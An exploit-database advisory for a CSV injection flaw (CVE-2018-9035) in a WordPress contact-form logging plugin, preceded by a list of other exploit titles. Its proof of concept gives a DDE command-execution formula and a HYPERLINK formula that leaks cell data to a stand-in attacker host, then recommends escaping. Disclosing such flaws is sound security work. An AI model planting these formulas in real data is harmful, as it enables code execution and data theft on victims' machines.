
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
40 lines
No EOL
1.6 KiB
Text
40 lines
No EOL
1.6 KiB
Text
# Exploit Title : Contact Form 7 to Database Extension Wordpress Plugin CSV Injection
|
|
# Date: 23-03-2018
|
|
# Exploit Author : Stefan Broeder
|
|
# Contact : https://twitter.com/stefanbroeder
|
|
# Vendor Homepage: None
|
|
# Software Link: https://wordpress.org/plugins/contact-form-7-to-database-extension
|
|
# Version: 2.10.32
|
|
# CVE : CVE-2018-9035
|
|
# Category : webapps
|
|
|
|
Description
|
|
===========
|
|
Contact Form 7 to Database Extension is a WordPress plugin with more than 400.000 active installations. Development is discontinued since 1 year. Version 2.10.32 (and possibly previous versions) are affected by a CSV Injection vulnerability.
|
|
|
|
Vulnerable part of code
|
|
=======================
|
|
File: contact-form-7-to-database-extension/ExportToCsvUtf8.php:135 prints value of column without checking if it contains a spreadsheet formula.
|
|
|
|
Impact
|
|
======
|
|
Arbitrary formulas can be injected into CSV/Excel files.
|
|
This can potentially lead to remote code execution at the client (DDE) or data leakage via maliciously injected hyperlinks.
|
|
|
|
Proof of Concept
|
|
============
|
|
In order to exploit this vulnerability, the attacker needs to insert an Excel formula into any of the contact form fields available. This will end up in the log, and if a WordPress administrator chooses to export this log as Excel/CSV file, the file will contain the formula. If he then opens the file, the formula will be calculated.
|
|
|
|
Example:
|
|
|
|
=cmd|'/C calc.exe'!Z0
|
|
|
|
or
|
|
|
|
=HYPERLINK("http://attacker.com/leak?="&A1&A2, "Click to load more data!")
|
|
|
|
|
|
Solution
|
|
========
|
|
|
|
The plugin should escape fields starting with '=' when it exports data to CSV or Excel formats. |